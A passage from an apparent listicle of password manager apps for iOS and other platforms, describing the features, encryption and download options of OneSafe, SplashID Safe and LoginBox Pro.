Besides this, OneSafe also provides advanced security for your accounts' passwords with features like auto-lock, intrusion detection, self-destruct mode, decoy safe and double protection.
Download OneSafe Password Manager: iOS | Mac | Android | Windows

2. SPLASHID SAFE PASSWORD MANAGER (CROSS-PLATFORM)

SplashID Safe is one of the oldest and best password management tools for iOS that allows users to securely store their login data and other sensitive information in an encrypted record.
All your information, including website logins, credit card and social security data, photos and file attachments, are protected with 256-bit encryption.
SplashID Safe Password Manager app for iOS also provides web autofill option, meaning you will not have to bother copy-pasting your passwords in login.
The free version of SplashID Safe app comes with basic record storage functionality, though you can opt for premium subscriptions that provide cross-device syncing among other premium features.
Download SplashID Safe Password Manager: Windows and Mac | iOS | Android

3. LOGIN BOX PRO PASSWORD MANAGER

LoginBox Pro is another great password manager app for iOS devices. The app provides single-tap login to any website you visit, making it the safest and fastest way to sign in to password-protected internet sites.
LoginBox Password Manager app for iOS combines a password manager with a browser.
From the moment you download it, all your login actions, including entering information, tapping buttons, checking boxes, or answering security questions, are completed automatically by the LoginBox Password Manager app.
For security, the LoginBox Password Manager app uses hardware-accelerated AES encryption and a passcode to encrypt your data and save it on your device itself.
Download LoginBox Password Manager: iOS | Android